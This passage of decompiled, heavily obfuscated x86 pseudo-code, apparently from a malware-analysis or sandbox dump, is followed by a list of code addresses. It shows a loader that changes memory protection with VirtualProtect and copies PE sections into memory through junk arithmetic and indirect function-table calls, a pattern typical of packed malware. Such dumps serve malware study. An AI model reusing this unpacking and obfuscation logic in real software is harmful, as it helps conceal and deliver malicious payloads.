                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
                  				_t862 = _t859;
                  				 *_t1129 =  *_t1129 - _t1071;
                  				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
                  				 *_t1129 = _t816 + 0x41ca88;
                  				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
                  				_v20 = _t862;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
                  				_t865 = _v20;
                  				_pop( *_t211);
                  				_v8 = _v8 & 0x00000000;
                  				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
                  				_t819 = _t816;
                  				 *_t1129 =  *_t1129 & 0x00000000;
                  				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
                  				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
                  				_t1112 = _t1109;
                  				 *_t1129 =  *_t1129 - _t865;
                  				 *_t1129 =  *_t1129 ^ _t1012;
                  				 *_t1129 = _t819 + 0x41ca0d;
                  				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
                  				 *_t1129 = _t677;
                  				 *_t1129 = _t819 + 0x41cbe6;
                  				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
                  				_t867 =  *_t1129;
                  				_t1130 = _t1129 - 0xfffffffc;
                  				 *_t230 = _t679;
                  				_v16 = _v16 + _t867;
                  				_push(_v16);
                  				_pop(_t680);
                  				_t821 = _t819;
                  				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
                  				_t1074 = _t1071;
                  				if(_t869 > _t680) {
                  					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
                  					_v12 = 0;
                  					 *_t1130 =  *_t1130 | _t235;
                  					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
                  					 *_t1130 =  *_t1130 & 0x00000000;
                  					 *_t1130 =  *_t1130 + _t238;
                  					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
                  				}
                  				 *_t1130 = _t1012;
                  				 *(_t821 + 0x41c918) = 0 ^ _t680;
                  				_t1015 = 0;
                  				_v16 = _t869;
                  				_v16 = 0;
                  				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
                  				_t247 = _t821 + 0x41d093; // 0x41d093
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 | _t247;
                  				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t1130 = _t1015;
                  				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
                  				_t1018 = 0;
                  				 *_t250 = _t821;
                  				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
                  				_t1077 = _t1074;
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 ^ _v16;
                  				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
                  				_v20 = 0;
                  				 *_t1130 =  *_t1130 | _t253;
                  				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
                  				_v20 = _t1020;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
                  				_t1023 = _v20;
                  				_t1131 =  &(_t1130[1]);
                  				 *_t1131 = _t684;
                  				_t1078 = _a4;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 |  *_t1130;
                  				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t268;
                  				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t689;
                  				_t273 = _t821 + 0x41c931; // 0x41c931
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t273;
                  				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t275 = _t1023;
                  				_v20 = _t821;
                  				_push(0 + _v16 + _t691);
                  				_t824 = _v20;
                  				_pop(_t692);
                  				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
                  				_pop( *_t280);
                  				_push(_v12);
                  				_pop(_t875);
                  				if(_t875 > _t692) {
                  					 *_t1131 = _t824 + 0x41ca9e;
                  					 *_t1131 =  *_t1131 & 0x00000000;
                  					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
                  					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
                  					 *_t286 = _t692;
                  					_push(_v16);
                  					_pop( *_t288);
                  				}
                  				_pop( *_t289);
                  				_t945 = _v12;
                  				_v12 = _t692;
                  				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
                  				 *_t1131 =  *_t1131 ^ _t824;
                  				 *_t1131 =  *_t1131 + _t945;
                  				_v12 = 0;
                  				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
                  				 *_t1131 = _t824 + 0x41c856;
                  				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
                  				_v20 = _t1078;
                  				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
                  				_t1081 = _v20;
                  				_pop( *_t304);
                  				_t947 = 0 ^ _v20;
                  				_t879 = 0 ^  *_t1131;
                  				_t1132 = _t1131 - 0xfffffffc;
                  				if(_t1023 != _t1081) {
                  					 *_t1132 =  *_t1132 - _t1023;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t947;
                  					_v16 = 0;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
                  					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t739;
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
                  					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
                  					_t1139 = _t1132 - 0xfffffffc;
                  					 *_t317 = _t741;
                  					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v20);
                  					_pop(_t742);
                  					_t1045 = _t1023;
                  					_push(0);
                  					 *_t1139 = _t1045;
                  					_t906 = 0 ^  *(_t824 + 0x41c244);
                  					if(_t906 > _t742) {
                  						 *_t1139 =  *_t1139 ^ _t906;
                  						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
                  						 *_t1139 =  *_t1139 & 0x00000000;
                  						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
                  						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
                  						_push(0);
                  						 *_t1139 = _t947;
                  						 *(_t824 + 0x41cf47) = 0 ^ _t797;
                  					}
                  					_pop( *_t326);
                  					_t969 = _v12;
                  					_t908 =  *_t1139;
                  					_t1140 = _t1139 - 0xfffffffc;
                  					do {
                  						asm("movsb");
                  						_v12 = 0;
                  						 *_t1140 =  *_t1140 + _t908;
                  						_v12 = _v12 & 0x00000000;
                  						 *_t1140 =  *_t1140 + _t969;
                  						 *_t1140 =  *_t1140 - _t969;
                  						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
                  						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
                  						 *_t1140 =  *_t1140 ^ _t1112;
                  						 *_t1140 =  *_t1140 ^ _t744;
                  						 *_t1140 =  *_t1140 & 0x00000000;
                  						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
                  						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
                  						_t1141 =  &(_t1140[1]);
                  						 *_t337 = _t746;
                  						_v20 = _v20 +  *_t1140;
                  						_push(_v20);
                  						_pop(_t747);
                  						_t1081 = _t1081;
                  						_v12 = _t747;
                  						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
                  							 *_t1141 = _t824 + 0x41c831;
                  							 *_t1141 = _t824 + 0x41c7fa;
                  							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
                  							_v16 = _t969;
                  							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
                  						}
                  						_pop( *_t352);
                  						_t969 = 0 + _v12;
                  						_t1140 = _t1141 - 0xfffffffc;
                  						_t908 =  *_t1141 - 1;
                  					} while (_t908 != 0);
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t969;
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
                  					_v20 = 0;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
                  					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
                  					_t975 =  *_t1140;
                  					_t1142 = _t1140 - 0xfffffffc;
                  					_v12 = _t753;
                  					_t756 = _v12;
                  					 *_t1142 =  *_t1142 ^ _t756;
                  					 *_t1142 =  *_t1142 ^ _t975;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
                  					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
                  					_pop( *_t371);
                  					_push(_v16);
                  					_pop( *_t373);
                  					_pop( *_t374);
                  					_t977 = _t975 & 0x00000000 ^ _v16;
                  					 *(_t824 + 0x41c60a) = 0x40;
                  					 *_t1142 = _t977;
                  					_v16 = 0;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
                  					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
                  					 *_t1142 = _t760;
                  					 *_t1142 = _t824 + 0x41c438;
                  					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
                  					_pop( *_t386);
                  					 *_t1142 =  *_t1142 | _t824;
                  					_t830 = _t762;
                  					_t824 = 0;
                  					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
                  					_t916 =  *(_t824 + 0x41d118);
                  					_t1052 = _v16;
                  					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
                  						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
                  						 *_t1142 =  *_t1142 - _t916;
                  						 *_t1142 =  *_t1142 + _t391;
                  						_t392 = _t824 + 0x41c438; // 0x41c438
                  						 *_t1142 =  *_t1142 ^ _t977;
                  						 *_t1142 =  *_t1142 | _t392;
                  						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
                  						_v20 = _t977;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
                  					}
                  					_t979 =  *_t1142;
                  					_t1143 = _t1142 - 0xfffffffc;
                  					_t401 = _t824 + 0x41c60a; // 0x41c60a
                  					 *_t1143 =  *_t1143 - _t979;
                  					 *_t1143 =  *_t1143 ^ _t401;
                  					 *_t1143 = _t979;
                  					_t403 = _t824 + 0x41cb46; // 0x41cb46
                  					 *_t1143 =  *_t1143 & 0x00000000;
                  					 *_t1143 =  *_t1143 + _t403;
                  					_t404 = _t824 + 0x41c91c; // 0x41c91c
                  					 *_t1143 = _t404;
                  					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
                  					 *_t1143 = _t1081;
                  					 *(_t824 + 0x41cf40) = 0 ^ _t767;
                  					_t1097 = 0;
                  					_t981 =  *_t1143;
                  					_t1144 =  &(_t1143[1]);
                  					_pop( *_t408);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + (0 ^ _v20);
                  					 *_t1144 = _t981;
                  					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
                  					 *_t1144 = _t411;
                  					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
                  					 *_t418 = _t981;
                  					_t986 = _v12;
                  					 *_t1144 = 2;
                  					_v12 = _v12 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t986;
                  					_t423 = _t824 + 0x41cfff; // 0x41cfff
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t423;
                  					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + _t773;
                  					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
                  					 *_t1144 =  *_t1144 - _t1112;
                  					 *_t1144 =  *_t1144 | _t425;
                  					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
                  					_t1132 =  &(_t1144[1]);
                  					 *_t427 = _t775;
                  					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
                  					_push(_v20);
                  					_pop(_t776);
                  					_t1054 = _t1052;
                  					 *_t1132 = _t1054;
                  					_t879 =  *(_t824 + 0x41d0fa);
                  					_t1057 = 0;
                  					if(_t879 > _t776) {
                  						_t432 = _t824 + 0x41cfff; // 0x41cfff
                  						 *_t1132 =  *_t1132 - _t1112;
                  						 *_t1132 =  *_t1132 + _t432;
                  						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
                  						 *_t1132 =  *_t1132 ^ _t1112;
                  						 *_t1132 =  *_t1132 + _t433;
                  						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
                  						_v12 = _t1097;
                  						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
                  						_t1097 = _v12;
                  					}
                  					_pop( *_t438);
                  					_t987 = _v12;
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 = _t987;
                  					_t440 = _t824 + 0x41c42d; // 0x41c42d
                  					 *_t1132 =  *_t1132 - _t1097;
                  					 *_t1132 =  *_t1132 + _t440;
                  					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
                  					 *_t1132 = _t1057;
                  					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
                  					_t1060 = 0;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1060;
                  					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t446;
                  					_t449 = _t824 + 0x41c298; // 0x41c298
                  					 *_t1132 =  *_t1132 ^ _t1097;
                  					 *_t1132 = _t449;
                  					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
                  					_v16 = _t987;
                  					 *(_t824 + 0x41c405) = 0 ^ _t781;
                  					_t947 = _v16;
                  					VirtualProtect(_t1097, _v12, _v16, ??);
                  					_t455 = _t824 + 0x41c772; // 0x41c772
                  					_v20 = 0;
                  					 *_t1132 =  *_t1132 ^ _t455;
                  					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 =  *_t1132 | _t458;
                  					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
                  					_v12 = _t1060;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
                  					_t1023 = _v12;
                  				}
                  				_pop( *_t467);
                  				_v16 = 0;
                  				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
                  				 *_t1132 =  *_t1132 ^ _t879;
                  				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
                  				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
                  				_v16 = _t947;
                  				 *(_t824 + 0x41c775) = 0 ^ _t701;
                  				_t950 = _v16;
                  				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
                  				_t827 = _t824;
                  				_v20 = 0;
                  				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
                  				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
                  				_pop( *_t485);
                  				_push(_v12);
                  				_pop( *_t487);
                  				do {
                  					 *_t1132 = _t1026;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
                  					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 | _t706;
                  					 *_t1132 = _t827 + 0x41ca40;
                  					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
                  					_t1133 = _t1132 - 0xfffffffc;
                  					 *_t497 = _t708;
                  					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v12);
                  					_pop(_t709);
                  					_t1028 = _t1026;
                  					_v16 = _t950;
                  					_t882 = 0 ^  *(_t827 + 0x41d332);
                  					_t953 = _v16;
                  					if(_t882 > _t709) {
                  						 *_t1133 =  *_t1133 ^ _t1112;
                  						 *_t1133 = _t827 + 0x41c966;
                  						 *_t1133 =  *_t1133 & 0x00000000;
                  						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
                  						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
                  					}
                  					 *_t1133 = _t882;
                  					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
                  					_v20 = _t1028;
                  					_t1031 = _v20;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
                  					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
                  					 *_t1133 = _t711;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
                  					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
                  					_t1134 =  &(_t1133[1]);
                  					_v20 = _a4;
                  					_push( *_t1133 + _t713);
                  					_t1085 = _v20;
                  					_pop(_t714);
                  					_push( *((intOrPtr*)(_t827 + 0x41cece)));
                  					_pop( *_t525);
                  					_push(_v20);
                  					_pop(_t888);
                  					if(_t888 > _t714) {
                  						 *_t1134 =  *_t1134 - _t888;
                  						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
                  						_v20 = _v20 & 0x00000000;
                  						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
                  						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
                  					}
                  					_v12 = _t1085;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
                  					 *_t1134 = _t1112;
                  					_t889 = 0 ^  *(_t1031 + 0x10);
                  					_t1112 = 0;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 ^ _t889;
                  					_v20 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
                  					 *_t1134 =  *_t1134 ^ _t1112;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
                  					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
                  					_v20 = _t1031;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
                  					_t1034 = _v20;
                  					 *_t552 = _t1112;
                  					_push(_v12);
                  					_pop( *_t555);
                  					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
                  					_push(_v16);
                  					_pop(_t1089);
                  					_t955 = _t953;
                  					_v16 = 0;
                  					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
                  					_v12 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
                  					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
                  					 *_t1134 = _t955;
                  					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
                  					_t958 = 0;
                  					_pop( *_t567);
                  					_t893 = _v16;
                  					_t1035 =  *(_t1034 + 0xc);
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t893;
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 = _t827 + 0x41c5a4;
                  					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 =  *_t1134 ^ _t722;
                  					 *_t1134 =  *_t1134 ^ _t1035;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
                  					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
                  					 *_t574 = _t1035;
                  					 *_t1134 =  *_t1134 + _t827;
                  					_t828 = _t724;
                  					_t827 = 0;
                  					_push( *((intOrPtr*)(_t827 + 0x41d348)));
                  					_pop( *_t577);
                  					_push(_v12);
                  					_pop(_t896);
                  					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
                  						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
                  						 *_t1134 =  *_t1134 ^ _t958;
                  						 *_t1134 =  *_t1134 | _t579;
                  						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
                  						 *_t1134 =  *_t1134 - _t896;
                  						 *_t1134 =  *_t1134 | _t580;
                  						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
                  						_v20 = _t1089;
                  						 *(_t827 + 0x41c50f) = 0 ^ _t733;
                  						_t1089 = _v20;
                  					}
                  					_v12 = _t958;
                  					_t1036 =  *(_t827 + 0x41c166) + _t1035;
                  					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
                  					_t1136 =  &(_t1134[4]);
                  					_t879 = 0;
                  					_t1132 = _t1136 - 0xfffffffc;
                  					_push(_v12);
                  					_t1026 =  *_t1136 + 0x28;
                  					_pop(_t950);
                  					_t588 =  &_v8;
                  					 *_t588 = _v8 - 1;
                  				} while ( *_t588 != 0);
                  				_pop( *_t590);
                  				_t1041 = _v16;
                  				_push(_t1112);
                  				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
                  				_v20 = _v20 +  *(_t827 + 0x41c166);
                  				_push(_v20);
                  				_pop(_t729);
                  				_t1043 = _t1041;
                  				 *_t1132 = _t950;
                  				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
                  				_t966 = 0;
                  				_v12 = 0;
                  				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
                  				_t901 = _v12;
                  				if(_t1091 > 0) {
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1091;
                  					_t730 = E03054E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
                  					 *_t1132 = _t1091;
                  					_t729 = E03052FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
                  				}
                  				_pop( *_t603);
                  				return _t729;
                  			}


































































































































































































                  0x03055f16
                  0x03055f16
                  0x03055f16
                  0x03055f17
                  0x03055f1b
                  0x03055f1e
                  0x03055f20
                  0x03055f23
                  0x03055f24
                  0x03055f28
                  0x03055f2b
                  0x03055f2c
                  0x03055f30
                  0x03055f39
                  0x03055f3a
                  0x03055f3d
                  0x03055f46
                  0x03055f4a
                  0x03055f4d
                  0x03055f56
                  0x03055f57
                  0x03055f5a
                  0x03055f5d
                  0x03055f63
                  0x03055f66
                  0x03055f6e
                  0x03055f71
                  0x03055f72
                  0x03055f75
                  0x03055f78
                  0x03055f7b
                  0x03055f84
                  0x03055f85
                  0x03055f88
                  0x03055f8b
                  0x03055f91
                  0x03055f94
                  0x03055f9d
                  0x03055f9e
                  0x03055fa2
                  0x03055fa5
                  0x03055fab
                  0x03055fb1
                  0x03055fb5
                  0x03055fb8
                  0x03055fbb
                  0x03055fbe
                  0x03055fc0
                  0x03055fcb
                  0x03055fd2
                  0x03055fda
                  0x03055fdd
                  0x03055fe6
                  0x03055fe7
                  0x03055fea
                  0x03055ff3
                  0x03055ff4
                  0x03055ff7
                  0x03055ffa
                  0x03055ffa
                  0x03056002
                  0x03056005
                  0x03056009
                  0x0305600d
                  0x03056017
                  0x0305601b
                  0x03056025
                  0x03056029
                  0x0305602c
                  0x03056032
                  0x03056039
                  0x0305604b
                  0x03056054
                  0x0305605e
                  0x03056067
                  0x03056068
                  0x0305606b
                  0x0305606e
                  0x03056074
                  0x0305607b
                  0x0305607e
                  0x03056088
                  0x0305608b
                  0x03056094
                  0x03056095
                  0x03056098
                  0x0305609b
                  0x030560a1
                  0x030560a7
                  0x030560ae
                  0x030560b7
                  0x030560be
                  0x030560c1
                  0x030560c8
                  0x030560cb
                  0x030560d4
                  0x030560db
                  0x030560de
                  0x030560e4
                  0x030560e7
                  0x030560ee
                  0x030560f1
                  0x030560f4
                  0x030560f7
                  0x030560f8
                  0x03056106
                  0x03056108
                  0x0305610b
                  0x03056114
                  0x03056118
                  0x03056124
                  0x03056127
                  0x0305612d
                  0x03056133
                  0x0305613a
                  0x03056140
                  0x03056147
                  0x0305614a
                  0x0305614f
                  0x03056156
                  0x0305615c
                  0x0305615f
                  0x03056162
                  0x0305616b
                  0x0305616e
                  0x03056172
                  0x03056176
                  0x0305617a
                  0x0305617e
                  0x03056188
                  0x0305618c
                  0x03056195
                  0x0305619c
                  0x0305619f
                  0x030561ab
                  0x030561b2
                  0x030561be
                  0x030561c1
                  0x030561c8
                  0x030561d1
                  0x030561db
                  0x030561de
                  0x030561e5
                  0x030561e8
                  0x030561f1
                  0x030561fb
                  0x030561fe
                  0x03056206
                  0x03056209
                  0x03056210
                  0x03056213
                  0x03056216
                  0x03056219
                  0x0305621a
                  0x0305621b
                  0x03056231
                  0x03056239
                  0x03056240
                  0x03056249
                  0x03056253
                  0x03056256
                  0x03056256
                  0x0305625e
                  0x03056265
                  0x0305626b
                  0x0305626c
                  0x03056276
                  0x03056279
                  0x03056283
                  0x0305628c
                  0x03056296
                  0x03056299
                  0x0305629f
                  0x030562a9
                  0x030562b5
                  0x030562b8
                  0x030562c3
                  0x030562c6
                  0x030562cd
                  0x030562ce
                  0x030562d1
                  0x030562d2
                  0x030562dd
                  0x030562df
                  0x030562e4
                  0x030562ec
                  0x030562f6
                  0x03056300
                  0x03056303
                  0x03056306
                  0x0305630c
                  0x03056314
                  0x0305631b
                  0x03056321
                  0x03056321
                  0x0305632a
                  0x0305632d
                  0x03056335
                  0x03056338
                  0x0305633b
                  0x0305633e
                  0x0305633f
                  0x03056343
                  0x0305634d
                  0x03056351
                  0x0305635d
                  0x03056360
                  0x03056368
                  0x0305636f
                  0x03056375
                  0x0305637c
                  0x0305637f
                  0x03056385
                  0x03056389
                  0x0305638c
                  0x03056396
                  0x03056399
                  0x030563a2
                  0x030563a9
                  0x030563ac
                  0x030563b4
                  0x030563bb
                  0x030563c1
                  0x030563c7
                  0x030563ca
                  0x030563d1
                  0x030563d3
                  0x030563dc
                  0x030563e6
                  0x030563e9
                  0x030563f0
                  0x030563f3
                  0x030563fd
                  0x03056400
                  0x03056403
                  0x03056412
                  0x03056417
                  0x0305641b
                  0x0305641e
                  0x03056420
                  0x03056421
                  0x0305642c
                  0x0305642e
                  0x03056433
                  0x0305643c
                  0x0305643f
                  0x03056448
                  0x03056452
                  0x03056455
                  0x03056455
                  0x03056461
                  0x03056468
                  0x0305646e
                  0x03056474
                  0x03056477
                  0x03056483
                  0x03056486
                  0x0305648c
                  0x03056494
                  0x0305649b
                  0x030564a1
                  0x030564a6
                  0x030564b2
                  0x030564b6
                  0x030564b9
                  0x030564c1
                  0x030564c5
                  0x030564c8
                  0x030564d4
                  0x030564db
                  0x030564e1
                  0x030564e3
                  0x030564e6
                  0x030564f2
                  0x030564f5
                  0x030564fe
                  0x0305650a
                  0x0305650d
                  0x03056515
                  0x03056518
                  0x0305651f
                  0x03056522
                  0x03056525
                  0x03056528
                  0x03056529
                  0x03056537
                  0x03056539
                  0x0305653c
                  0x0305653e
                  0x03056544
                  0x0305654e
                  0x03056551
                  0x03056558
                  0x0305655c
                  0x0305655f
                  0x0305655f
